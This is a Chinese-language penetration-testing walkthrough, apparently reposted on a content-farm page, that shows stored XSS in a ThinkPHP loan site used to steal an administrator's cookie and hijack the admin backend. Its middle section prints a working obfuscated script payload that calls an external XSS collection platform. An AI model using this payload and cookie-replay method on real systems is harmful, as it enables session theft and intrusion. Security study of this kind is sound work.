文章插圖

簡介請注意：
本文僅用于技術(shù)討論與研究，對于所有筆記中復現(xiàn)的這些終端或者服務器，都是自行搭建的環(huán)境進行滲透的 。我將使用Kali Linux作為此次學習的攻擊者機器 。這里使用的技術(shù)僅用于學習教育目的，如果列出的技術(shù)用于其他任何目標，本站及作者概不負責 。
名言：
你對這行的興趣，決定你在這行的成就！
2021最新整理網(wǎng)絡安全滲透測試/安全學習（全套視頻、大廠面經(jīng)、精品手冊、必備工具包）一>關(guān)注我，私信回復“資料”獲取<一
一、前言網(wǎng)絡釣魚是社會工程學攻擊方式之一，主要是通過對受害者心理弱點、本能反應、好奇心、信任、貪婪等心理陷阱進行諸如欺騙、傷害等危害手段！
網(wǎng)絡釣魚攻擊是個人和公司在保護其信息安全方面面臨的最常見的安全挑戰(zhàn)之一 。無論是獲取密碼等，還是其他敏感信息，黑客都在使用電子郵件、社交媒體、電話和任何可能的通信方式竊取有價值的數(shù)據(jù) 。
網(wǎng)絡釣魚攻擊的興起對所有組織都構(gòu)成了重大威脅 。重要的是，如果他們要保護自己的信息，所有組織都應該知道如何發(fā)現(xiàn)一些最常見的網(wǎng)絡釣魚騙局 。同樣還要熟悉攻擊者用來實施這些騙局的一些最常見的技術(shù)類型 。
這篇主要演示如何利用XSS植入釣魚，獲得管理員內(nèi)部電腦權(quán)限！
二、環(huán)境介紹黑客（攻擊者）：
IP：192.168.1.9
系統(tǒng)：kali.2020.4
kali上作為cs的服務端！
VPS服務器：
thinkphp平臺地址：
http://test1.dayuixiyou.cn/
釣魚地址：
http://flash.dayuixiyou.cn
辦公電腦：
系統(tǒng)：windwos7
雙網(wǎng)卡：
192.168.175.153
10.10.1.5
目前kali上運行了Cobalt strike ，攻擊者在自己的公網(wǎng)VPS服務器上制作了后門頁面釣魚，通過滲透發(fā)現(xiàn)thinkphp貸款平臺頁面存在XSS漏洞利用，通過插入XSS-js代碼，植入鏈接，最終黑客控制管理員辦公電腦的過程?。?br /> 三、XSS演示此次演示貸款thinkphp平臺在公網(wǎng)服務器上！
1、注冊賬號密碼進入個人中心！
注冊用戶名密碼！
登錄用戶名密碼后，普通用戶界面！點擊設置！
輸入結(jié)算信息，測試下！
2、存在XSS漏洞輸入：
測試結(jié)果修改成功！查看下前端…
查看源代碼-編輯后查看到?jīng)]變動，XSS代碼還是存在…說明存在XSS攻擊
3、注冊XSS平臺 https://xss.pt/xss.php?do=login進入XSS利用平臺，google也有很多別的平臺?。‰S意注冊一個賬號！

創(chuàng)建一個新的項目，隨意填寫！
選擇Keepsession保持會話！
下一步！
會彈出需要執(zhí)行的XSS利用代碼…選擇標準代碼測試！
</tExtArEa>’”><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
4、利用XSS漏洞</tExtArEa>’”><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>
這一段就是payload！將XSS連接信息返回到https://xss.pt平臺上！
提交信息后，可看到網(wǎng)絡net中XSS執(zhí)行成功了…
執(zhí)行成功，那么XSS平臺就收到了信息，可看到！
5、獲取管理員cookie點擊提現(xiàn)…
申請結(jié)算，成功后，會將XSS執(zhí)行代碼轉(zhuǎn)發(fā)到后臺結(jié)算該模塊中！
當后臺管理員訪問管理界面，給客戶結(jié)算資金的時候，點擊提現(xiàn)申請模塊！就會執(zhí)行XSS植入的代碼??！
這時候，就返回了管理員的cookie和URL信息！
6、cookie登錄后臺目錄掃描獲得管理后臺登錄頁面，通過Burp suite轉(zhuǎn)包攔截后！
將XSS平臺獲取XSS漏洞植入代碼返回的包中，修改其中的url和cookie信息！
send執(zhí)行后，通過cookie進入到了管理員后臺！

以上關(guān)于本文的內(nèi)容，僅作參考！溫馨提示：如遇健康、疾病相關(guān)的問題，請您及時就醫(yī)或請專業(yè)人士給予相關(guān)指導!

「愛刨根生活網(wǎng)」www.malaban59.cn小編還為您精選了以下內(nèi)容，希望對您有所幫助：

• Linux切換到root用戶 linux切換root用戶命令有哪些
• linux查看防火墻狀態(tài)及開啟關(guān)閉命令 linux查看防火墻是否開啟
• Linux改文件名命令 linux改文件名怎么改
• linux系統(tǒng)下的虛擬機 linux下虛擬機能自己啟動嗎
• linux改ip地址的改法 linux改ip地址怎么改
• linux重置系統(tǒng)到剛安裝狀態(tài) linux系統(tǒng)恢復初始化
• linux 新建文件夾的命令 linux如何創(chuàng)建文件夾
• Linux虛擬機三種網(wǎng)絡配置 linux虛擬機網(wǎng)絡設置
• linux和windows的區(qū)別 linux是什么意思
• 服務器開啟端口命令 linux開端口命令